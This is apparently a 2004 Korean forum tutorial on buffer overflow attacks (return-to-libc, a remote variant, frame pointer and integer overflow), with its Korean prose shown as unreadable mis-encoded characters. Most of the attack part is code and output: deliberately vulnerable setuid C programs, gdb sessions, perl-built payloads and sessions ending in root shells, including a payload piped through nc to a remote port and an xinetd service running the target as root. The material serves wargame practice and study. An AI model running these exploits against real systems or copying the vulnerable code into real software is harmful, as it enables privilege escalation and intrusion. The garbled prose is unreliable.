Overflow ¿¡ °ü½ÉÀÌ ÀÖÀ¸½Å ºÐµéÀº The Omega Project ¸¦ µé¾îº¸¼ÌÀ» °Ì´Ï´Ù. ¶ó¸¶±×¶ó
¶ó´Â ¿Ü±¹ ÇØÄ¿¿¡ ÀÇÇؼ ¾Ë·ÁÁø overflow °ø°Ý ±â¹ýÀε¥, °£·«ÇÏ°Ô ¼³¸íÇغ¸ÀÚ¸é
return to library ¸¦ ÀÌ¿ëÇÏ´Â °ÍÀÔ´Ï´Ù.
½Ã½ºÅÛ ³»¿¡¼ ÀÌÁø ÆÄÀÏÀº ´ëºÎºÐ °øÀ¯ ¶óÀ̺귯¸®ÀÇ Äڵ带 ÀÌ¿ëÇÏ°Ô µË´Ï´Ù.
°øÀ¯ ¶óÀ̺귯¸®°¡ ¸ÅÇÎµÈ ¸Þ¸ð¸® ÁÖ¼Ò¿¡ Á¢±ÙÇÏ¿©, ƯÁ¤ ±â°è¾î Äڵ带 Á÷Á¢ »ðÀÔÇÏ¿©
»ç¿ëÇÏÁö ¾Ê°íµµ ¿øÇÏ´Â ±â´ÉÀ» ¼öÇàÇÒ ¼ö ÀÖ´Â °ÍÀÌ ÀåÁ¡ÀÔ´Ï´Ù.
ÀÚ¼¼ÇÑ ±â¹ýÀº The Omega Project ¹®¼¸¦ º¸½Ã±â ¹Ù¶ó¸ç, 1 ÆÄÆ®¿¡¼´Â Omega ¹®¼¿¡¼
³ª¿Â ¹æ¹ýÀ» wargame À¸·Î ¸¸µé°í ±× °ÍÀ» Ç®ÀÌÇÏ¿© º¸°Ú½À´Ï´Ù.
/* 5.c */
void function(char *str)
{
char buf[4];
strcpy(buf, str);
}
int main(int argc, char *argv[])
{
if(argc==2)
function(argv[1]);
}
[root@hacking doc]# gcc -o 5 5.c
[root@hacking doc]# chmod 6755 5
¸ÅÇÎµÈ °øÀ¯ ¶óÀ̺귯¸®ÀÇ system() ÇÔ¼ö¸¦ ½ÇÇàÇÏ°í, À̶§ ½ÇÇàÇÏ´Â garbage ¸¦
ÆÄÀÏ À̸§À¸·Î ¸¸µé¾î ½©À» ¾ò¾îº¸°Ú½À´Ï´Ù.
[beist@hacking doc]$ gdb 5
(gdb) b main
Breakpoint 1 at 0x8048348
(gdb) r
Starting program: /bof/doc/5
Breakpoint 1, 0x08048348 in main ()
(gdb) x/i system
0x42041e50 <system>: push %ebp
(gdb) quit
system ÀÇ ÁÖ¼Ò´Â 0x42041e50 ÀÔ´Ï´Ù.
[beist@hacking doc]$ ./5 `perl -e 'print "\x50\x1e\x04\x42"x3'`
sh: line 1: ä¡B?@€? command not found
Illegal instruction
system() ÇÔ¼ö°¡ ½ÇÇàµÇ¾úÁö¸¸ ÀÌ»óÇÑ ¹®ÀÚ¿ ¶§¹®¿¡ command not found ¶ó´Â
¿¡·¯°¡ ³ª°Ô µË´Ï´Ù.
[beist@hacking doc]$ ./5 `perl -e 'print "\x50\x1e\x04\x42"x3'` 2> err
Illegal instruction
¿¡·¯ ¸Þ¼¼Áö¸¦ ¸®´ÙÀÌ·º¼ÇÀ» ÅëÇØ err ÆÄÀÏ¿¡ ´ã¾Ò½À´Ï´Ù.
[beist@hacking doc]$ cat err|awk -F ':' '{print $3}'|awk -F ' ' '{print $1}' > ok
[beist@hacking doc]$ cat ok
ä¡B?@€?
awk ¸¦ ÀÌ¿ëÇÏ¿© ¿¡·¯ ¸Þ¼¼Áö¿¡¼, garbage ¹®ÀÚ°ª¸¸ ±¸º°ÇÏ¿© ok ÆÄÀÏ¿¡ ´ã¾Ò½À´Ï´Ù.
ÀÌ garbage ¹®ÀÚ¿·Î, /bin/sh ¸¦ °¡¸£Å°´Â ½Éº¼¸¯ ¸µÅ©¸¦ ¸¸µé°Ú½À´Ï´Ù.
[beist@hacking doc]$ ln -s /bin/sh `cat ok`
[beist@hacking doc]$ ls -al
ÇÕ°è 80
drwxrwxrwx 2 beist beist 4096 2¿ù 4 04:41 .
drwxrwxrwx 3 root root 4096 2¿ù 3 07:51 ..
-rwsr-sr-x 1 root root 11399 2¿ù 4 04:29 5
-rw-r--r-- 1 root root 132 2¿ù 4 04:28 5.c
-rw-rw-r-- 1 beist beist 42 2¿ù 4 04:34 err
-rw-rw-r-- 1 beist beist 11 2¿ù 4 04:38 ok
lrwxrwxrwx 1 beist beist 7 2¿ù 4 04:41 ä¡?B?+?@?? -> /bin/sh
½Éº¼¸¯ ¸µÅ©ÀÇ ÆÄÀÏÀÌ ¼º°øÀûÀ¸·Î ¸¸µé¾îÁ³½À´Ï´Ù. ±×·³, PATH ȯ°æ º¯¼ö¿¡ ÇöÀç
µð·ºÅ丮¸¦ ¶æÇÏ´Â, "." ¸¦ Ãß°¡ÇÏ°Ú½À´Ï´Ù.
[beist@hacking doc]$ PATH=.:$PATH
[beist@hacking doc]$ export PATH
°ø°ÝÀ» ½ÃµµÇغ¸°Ú½À´Ï´Ù.
[beist@hacking doc]$ ps
PID TTY TIME CMD
11717 pts/0 00:00:00 bash
13372 pts/0 00:00:00 ps
[beist@hacking doc]$ ./5 `perl -e 'print "aaaabbbb","\x50\x1e\x04\x42"'`
[beist@hacking doc]# ps
PID TTY TIME CMD
11717 pts/0 00:00:00 bash
13375 pts/0 00:00:00 ä¡B?@€?
13404 pts/0 00:00:00 ps
°ø°ÝÀ» ½ÃµµÇÏ°í ³ ÈÄ¿¡, garbage ¹®ÀÚ¿À» °¡Áø ½Éº¼¸¯ ¸µÅ© ÆÄÀÏÀÌ /bin/sh
¸¦ °¡¸£ÄÑ ¼º°øÀûÀ¸·Î ½ÇÇàµÈ °ÍÀ» ps ¸í·É¾î·Î È®ÀÎÇÒ ¼ö ÀÖ¾ú½À´Ï´Ù.
6. ¶ó¸¶±×¶ó ¹öÀü #2
¶ó¸¶±×¶ó 2 ÆÄÆ®¿¡¼´Â ¶ó¸¶±×¶ó°¡ ¹ßÇ¥ÇÑ Omega Project ¸¦ ÀÀ¿ëÇÑ °ø°Ý
±â¹ýÀ» ¼³¸íÇÏ°Ú½À´Ï´Ù.
1 ÆÄÆ®¿¡¼ ¿ì¸®°¡ system() ÇÔ¼ö¸¦ ½ÇÇàÇßÀ» ¶§, garbage ¹®ÀÚ¿ÀÌ ½ÇÇàÀÌ
µÇ¾ú½À´Ï´Ù. ÀÌ garbage ¹®ÀÚ´Â ´ÙÀ½°ú °°Àº À§Ä¡¿¡¼ ÂüÁ¶µË´Ï´Ù.
[buf] [sfp] [ret] [dummy] [dummy2]
¿©±â¼ ret ¸¦ system() À¸·Î Àâ¾Ò´Ù¸é, system() ÇÔ¼öÀÇ ÀÎÀÚ·Î, ret+4 À§Ä¡ÀÎ,
dummy2 ¿¡¼ ÂüÁ¶¸¦ ÇÏ°Ô µË´Ï´Ù. dummy2 °¡ °¡¸£Å°°í ÀÖ´Â ¸Þ¸ð¸®¸¦ system()
ÇÔ¼öÀÇ ÀÎÀÚ·Î ÂüÁ¶ÇÏ°Ô µÇ´Â °ÍÀÔ´Ï´Ù.
¿ì¸®´Â Shell À» ½ÇÇà½ÃÅ°·Á°í Çϴϱî ret ´Â system() ÀÇ ÁÖ¼Ò¸¦ ÁöÁ¤ÇÏ°í,
dummy2 ¸¦, /bin/sh ¸¦ °¡¸£Å°´Â À§Ä¡·Î ÁöÁ¤À» ÇÏ¸é µË´Ï´Ù. ¶ó¸¶±×¶óÀÇ
±Û¿¡¼´Â °øÀ¯ ¶óÀ̺귯¸®¿¡¼ /bin/sh ¸¦ ã¾Ò¾ú´Âµ¥, ¿©±â¼´Â ´Ù¸¥ ¹æ¹ýÀ¸·Î
¾Ë¾Æº¸°Ú½À´Ï´Ù.
ÀÌ wargame Àº remote ȯ°æÀÔ´Ï´Ù.
¸Þ¸ð¸®¿¡ Shell À» ½ÇÇà½Ãų ¼ö Àִ ƯÁ¤ ¹®ÀÚ¿À» ¿Ã¸° ÈÄ, dummy2 ¿¡ ±× °ÍÀ»
ÁöÁ¤ÇØÁÖ´Â ¹æ¹ýÀ» Çغ¸°Ú½À´Ï´Ù.
¿ì¸®°¡ ¿øÇÏ´Â ¹®ÀÚ¿À» ¸Þ¸ð¸®¿¡ Áý¾î³Ö±â À§ÇÑ ¹æ¹ýÀº ¿©·¯°¡Áö°¡ Àִµ¥
¸î°¡Áö ¿¹¸¦ µé¾îº¸ÀÚ¸é ´ÙÀ½°ú °°½À´Ï´Ù.
1. argc ÀÌ¿ëÇϱâ
2. argv ÀÌ¿ëÇϱâ
3. ȯ°æ º¯¼ö ÀÌ¿ëÇϱâ
4. ÇÁ·Î±×·¥ÀÇ buffer ÀÌ¿ëÇϱâ
5. ±âŸ ÇÁ·Î±×·¥ ÀÎÅÍÇÁ¸®ÅÍ Å×À̺í
overflow ÀÇ ±Ã±ØÀûÀÎ ¸ñÀûÀº shell À» ¶ç¿ì´Â °ÍÀε¥, ¶ó¸¶±×¶ó ±â¹ý¿¡¼ ½©À»
¶ç¿ì±â À§Çؼ´Â ½©À» ½ÇÇà½Ãų ¼ö ÀÖ´Â ¹®ÀÚ¿À» ã¾Æ¾ßÇÕ´Ï´Ù. ¿ì¸®°¡ ¿©±â¼
ÀÌ¿ëÇÒ ¹®ÀÚ¿Àº ȯ°æ º¯¼ö ³»¿¡ Á¸ÀçÇÏ´Â SHELL ȯ°æ º¯¼öÀÇ °ªÀ» ÀÌ¿ëÇÒ °Í
ÀÔ´Ï´Ù. bash ¸¦ »ç¿ëÇÑ´Ù¸é SHELL ȯ°æ º¯¼öÀÇ °ªÀº "/bin/bash" °¡ µË´Ï´Ù.
[beist@hacking beist]$ echo $SHELL
/bin/bash
"/bin/bash" °¡ Ãâ·ÂµÇ´Â °ÍÀ» º¼ ¼ö ÀÖ½À´Ï´Ù.
º»°ÝÀûÀ¸·Î wargame ¹®Á¦¸¦ Çϳª ¸¸µé¾î¼ Ç®¾îº¸°Ú½À´Ï´Ù.
/* 6.c */
void function(char *str)
{
char buf[4];
strncpy(buf, str, 20);
memset(buf, 0, 8);
memset(buf+12, 0, 4);
if(buf[19]=='\x40' || buf[19]=='\x41' || buf[19]=='\x42' || buf[19]=='\x08')
{
printf("Error\n");
exit(-1);
}
}
int main(int argc, char *argv[])
{
if(argc==2)
{
if(strlen(argv[1]) <= 20 || strlen(argv[0]) > 3)
function(argv[1]);
}
}
¾Õ¼ ¼³¸íÇÏ¿´µíÀÌ ÀÌ ¹®Á¦´Â ȯ°æ º¯¼öÀÇ ¹®ÀÚ¿À» ÀÌ¿ëÇÏ¿©¼ Ç® °ÍÀÔ´Ï´Ù. ±×
Àü¿¡ ¹®Á¦¸¦ ¸®¸ðÆ®·Î ¼³Á¤Çϱâ À§ÇØ ´ÙÀ½°ú °°ÀÌ ¼³Á¤ÇÏ°Ú½À´Ï´Ù.
* wargame ¹®Á¦¸¦ ¸®¸ðÆ®·Î Ç®±â À§ÇØ xinetd.d ¿¡ µî·ÏÇÏ´Â °úÁ¤ *
[beist@hacking wargame]# gcc -o 6 6.c
[beist@hacking wargame]# cat > /etc/xinetd.d/lama2
service lama2
{
disable = no
flags = REUSE
socket_type = stream
wait = no
user = root
server = /wargame/6
log_on_failure += USERID
}
(Ctrl + D ÀÔ·Â)
[beist@hacking wargame]# echo "lama2 6666/tcp" > /etc/services
[beist@hacking wargame]# /etc/rc.d/init.d/xinetd restart
xinetd Stop OK...
xinetd Start OK...
wargame ¹®Á¦°¡ xinetd µ¥¸ó¿¡ Á¤»óÀûÀ¸·Î µî·ÏÀÌ µÇ¾ú´Ù¸é wargame ¼¹öÀÇ 6666
Æ÷Æ®·Î Á¢¼ÓÇßÀ» ¶§, wargame ¹®Á¦°¡ ¶ã °ÍÀÔ´Ï´Ù.
ÇöÀç target ÇÁ·Î±×·¥ÀÇ buffer »óÅ´ ´ÙÀ½°ú °°½À´Ï´Ù.
[ buf ] [ sfp ] [ ret ] [dummy] [dummy2]
buf ¿¡¼ºÎÅÍ 20 ¹ÙÀÌÆ®¸¦ µ¤¾î¾º¿ï¼ö Àֱ⠶§¹®¿¡ ½ÇÁ¦·Î ¿ì¸®°¡ Á¢±ÙÇÒ ¼ö ÀÖ´Â
¿µ¿ªÀº buf~dummy2 ¿µ¿ª±îÁöÀÔ´Ï´Ù. memset À¸·Î ÀÎÇؼ, buf, sfp, dummy ¿µ¿ªÀº
ÃʱâȵǹǷΠÀÌ¿ëÇÒ ¼ö ¾ø½À´Ï´Ù. ±×·¯¹Ç·Î ½ÇÁúÀûÀ¸·Î ÀÌ¿ëÇÒ ¼ö ÀÖ´Â buffer´Â
ret ¿Í dummy2 ÀÔ´Ï´Ù.
¿ì¸®°¡ ¾Ë¾Æ¾ß ÇÒ ¿µ¿ªÀº system() ÇÔ¼öÀÇ ÁÖ¼Ò¿Í SHELL ȯ°æ º¯¼öÀÇ ÁÖ¼Ò°ªÀε¥
ÀÌ ¿µ¿ªÀº ´ÙÀ½À̶ó°í °¡Á¤ÇÏ°Ú½À´Ï´Ù.
system = 0x8048424
SHELL = 0xbfffffe2
(½ÇÁ¦ wargame ¿¡¼´Â system() ÇÔ¼ö¸¦ Ãâ·ÂÇØÁÖ´Â °æ¿ì°¡ ¸¹À¸¸ç, ±×·¸Áö ¾ÊÀ¸¸é
brute force ¸¦ ÅëÇØ ¾Ë¾Æ³»¾ß ÇÕ´Ï´Ù.)
[beist@hacking beist]$ (perl -e 'print "aaaabbbb\x24\x84\x04\x08cccc\xe2\xff
\xff\xbf"';cat)|nc target 6666
id;
uid=0(root) gid=0(root)
root ½©À» ȹµæÇÏ¿´½À´Ï´Ù.
7. frame pointer
frame pointer overflow ±â¹ýÀº ÀϹÝÀûÀÎ overflow ±â¹ý°ú´Â Á¶±Ý ´Ù¸¨´Ï´Ù.
1 byte ¸¸À» overflow ½Ãų ¼ö ÀÖ½À´Ï´Ù. Á¦ 2 ¼¼´ë ±â¹ýÀ̶ó°íµµ ºÒ¸®´Â overflow
°ø°Ý ±â¼úÀ̸ç phrack 55 È£¿¡ ¼Ò°³µÇ¾î ÀÖ½À´Ï´Ù.
ÇÔ¼ö°¡ ³¡³¯ ¶§, ebp -> esp °¡ µÇ°í, ret ´Â esp -> eip ·Î ¸¸µì´Ï´Ù.
1 byte ¸¦ overflow ½Ãų ¼ö ÀÖ´Ù´Â À̾߱â´Â ebp ÀÇ ¸¶Áö¸· ÀÚ¸® ¼ö¸¦ ÇØÄ¿ ¸¶À½´ë·Î
º¯Á¶½Ãų ¼ö ÀÖ´Ù´Â °ÍÀ» ÀǹÌÇÕ´Ï´Ù.
wargame ¼Ò½º´Â ´ÙÀ½°ú °°½À´Ï´Ù.
7.c
void func(char *str)
{
char buf[4];
int i;
for(i=0;i<=4;i++)
buf[i]=str[i];
}
int main(int argc, char *argv[])
{
if (argc == 2)
func(argv[1]);
}
[beist@hacking doc]# gcc -o 7 7.c
[beist@hacking doc]# chmod 6755 7
¼Ò½º¿¡¼ º¸½Ã´Ù½ÃÇÇ, buffer ´Â 4 ¹ÙÀÌÆ®Áö¸¸ À߸øµÈ for ¹® »ç¿ëÀ¸·Î ÀÎÇØ
buffer ¿¡ 5 ¹ÙÀÌÆ®¸¦ ³ÖÀ» ¼ö ÀÖ½À´Ï´Ù. Áï, ebp ÀÇ ¸¶Áö¸· ¹ÙÀÌÆ®¸¦ µ¤À» ¼ö
ÀÖ´Ù´Â À̾߱âÀÔ´Ï´Ù.
buffer »óÅÂÀÔ´Ï´Ù.
[ buf ] [ ebp ] [ ret ]
°ø°Ý ¹æ¹ý·Ð.
1. eggshell À» ¶ç¿î´Ù.
2. buf ´Â eggshell ÀÇ ÁÖ¼Ò¸¦ °¡¸£Å²´Ù.
3. ebp ÀÇ ¸¶Áö¸· ¹ÙÀÌÆ®¸¦ buf ÀÇ ÁÖ¼Ò¸¦ °¡¸£Å²´Ù.
¿©±â¼ buf ÀÇ ÁÖ¼Ò´Â 0xbffff008 À̶ó°í °¡Á¤ÇÏ°Ú½À´Ï´Ù. ½ÇÁ¦ ÀÛ¾÷¿¡¼´Â
µð¹ö±ëÀ̳ª dumpcode ¸¦ ÅëÇؼ ¾Ë¾Æº¸½Ã±â ¹Ù¶ø´Ï´Ù.
[beist@hacking doc]$ ./egg
Using address: 0xbffff9f8
[beist@hacking doc]$ ./7 `perl -e 'print "\xf8\xf9\xff\xbf\x04"'`
sh-2.05b#
uid=0(root) gid=0(root) groups=500(beist)
½©À» ȹµæÇÏ¿´½À´Ï´Ù. ¿ø·¡ ebp ´Â 0xbffff0xx ¸¦ °¡¸£Å°°í ÀÖ°ÚÁö¸¸, ¸¶Áö¸·
1 byte ¸¦ \x04 ·Î µ¤¾î¾º¾ú½À´Ï´Ù. ebp °¡ pop µÇ±âÀü ebp ´Â, ¿ì¸®°¡ Á¶ÀÛÇÑ
0xbffff004 °¡ µÇ°ÚÁö¸¸, pop ÀÌ µÉ ¶§ ½ºÅÃÀÌ +4 °¡ µÇ¹Ç·Î °á°úÀûÀ¸·Î
0xbffff008 ÀÌ µÉ °ÍÀÔ´Ï´Ù. 0xbffff008 Àº egg shell ÀÇ ÁÖ¼ÒÀÎ 0xbffff9f8 À»
°¡¸£Å°°í ÀÖÀ¸¹Ç·Î ¿ì¸®´Â ½©À» µþ ¼ö ÀÖ¾ú½À´Ï´Ù.
ps. gcc ÀÇ »óÀ§ ¹öÀü¿¡¼, ¸¸¾à ¹öÆÛ »çÀÌ¿¡ garbage °ªÀÌ ³¢¾î¼ ebp ÀÇ
¸¶Áö¸· ¹ÙÀÌÆ®¿¡ µµ´ÞÇÒ ¼ö ¾ø´Ù¸é, frame pointer overflow °ø°ÝÀº ¼º°øÇÒ ¼ö
¾ø½À´Ï´Ù. Ȥ½Ã garbage °¡ ³¢¾î, ebp ¸¦ ¼öÁ¤ÇÒ ¼ö ¾ø´Â »óȲ¿¡¼µµ °ø°ÝÀ»
¼º°øÇÏ´Â ¹æ¹ýÀ» ¾Ë°í °è½Å ºÐÀº Àú¿¡°Ô ¿¬¶ôÁÖ½Ã¸é °¨»çÇÏ°Ú½À´Ï´Ù.
8. integer overflow
integer overflow ´Â ºñ±³Àû ÃÖ±Ù¿¡ ¼Ò°³µÈ overflow ±â¹ýÀÔ´Ï´Ù. °¢
º¯¼ö°¡ »ç¿ëÇÒ ¼ö ÀÖ´Â ¹üÀ§¸¦ ³Ñ¾î¼¹À» ¶§ integer overflow °¡ ÀϾ°Ô
µÇ´Âµ¥, À̶§ ¸¸¾à ÇÁ·Î±×·¥¿¡¼ º¯¼ö°¡ Â÷ÁöÇÏ´Â ºñÁßÀÌ ÄÇÀ» ¶§ Shell À»
µû°Å³ª ƯÁ¤ ÇàÀ§¸¦ ÇÒ ¼öµµ ÀÖ½À´Ï´Ù. ÀÌ ±â¹ý¿¡ ´ëÇÑ ÀÚ¼¼ÇÑ ¹æ¹ýÀº
phrack 60 È£¸¦ º¸½Ã°Å³ª, Á¦°¡ ºÎ¿¬ ¼³¸íÀ» ÇÑ ±ÛÀÌ ÀÖÀ¸´Ï ±× °Íµµ
ÂüÁ¶Çغ¸½Ã±â ¹Ù¶ø´Ï´Ù.
/* 8.c */
void function(char *str, int count)
{
char buf[65000];
strncpy(buf, str, count);
printf("result : %s\n");
}
int main(int argc, char *argv[])
{
unsigned short check;
int auth;
if(argc != 3)
{
printf("EX) %s int string\n", argv[0]);
return -1;
}
auth=atoi(argv[1]);
check=auth;
if(check >= 65000)
{
printf("check ¿¡ °É·ÈÀ½\n");
return -1;
}
function(argv[2], auth);
}
´ÙÀ½°ú °°Àº ¹æ¹ýÀ¸·Î °ø°ÝÀ» ½ÃµµÇغ¸°Ú½À´Ï´Ù.
1. ½©Äڵ带 ¸Þ¸ð¸®¿¡ ¿Ã·Á³õ´Â´Ù. (egg shell)
2. argv[1] ¿¡ 65536 À» ÀÔ·ÂÇÑ´Ù.
3. argv[2] ¿¡ 65536 ¸¸ÅÀÇ egg shell ÀÇ ÁÖ¼Ò¸¦ ÀÔ·ÂÇÑ´Ù.
(ÁÖ¼Ò°ªÀº 4 ¹ÙÀÌÆ®¸¦ Â÷ÁöÇÏ°í 65536 ¸¸Å ÀÔ·ÂÇÏ·Á¸é 4*16384 ¸¦ ÇؾßÇÕ´Ï´Ù.)
[beist@beist bof]$ ./egg
Using address: 0xbffffb18
[beist@beist bof]$ ./8 65536 `perl -e 'print "\x18\xfb\xff\xbf"x16384'`
result : ¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿¿û¿û¿û¿û¿
û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿
.. »ý·« ..
.. »ý·« ..
.. »ý·« ..
û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿û¿
sh-2.05#
9. ±âŸ overflow ¹æ¹ý (±ÛÀ» ¸¶Ä¡¸é¼)
ÀÌ ¹®¼´Â overflow ÀÇ ¸ðµç ±â¹ý¿¡ ´ëÇؼ ´Ù·é ¹®¼´Â ¾Æ´Õ´Ï´Ù.
buffer overflow °ø°Ý ±â¼úÀº, Å×Å©´ÐÀº °¢°¢ ´Þ¶óµµ ±Ã±ØÀûÀ¸·Î´Â return address ¸¦
º¯°æ ½ÃÄÑ¾ß ÇÑ´Ù´Â Á¡¿¡¼ °øÅëÁ¡ÀÌ ÀÖ½À´Ï´Ù. À§¿¡¼ ¼³¸íÇÑ ¹æ¹ý ÀÌ¿Ü¿¡µµ ´Ù¸¥
°ø°Ý °¡´É¼º°ú, °ø°Ý ±â¹ýµéÀÌ Á¸ÀçÇÕ´Ï´Ù.
ÀÌ ¹®¼¿¡¼ ¼Ò°³ÇÑ ³»¿ë ÀÌ¿Ü¿¡µµ Á¦ ȨÆäÀÌÁö¿¡¼ ´Ù¸¥ Á¾·ùÀÇ overflow Ç®ÀÌ¿¡
´ëÇؼ ´Ù·ç°í ÀÖÀ¸´Ï ±× ±Ûµéµµ Àо½Ã±â ¹Ù¶ø´Ï´Ù.
|
Hit : 16813 Date : 2004/07/07 05:18
|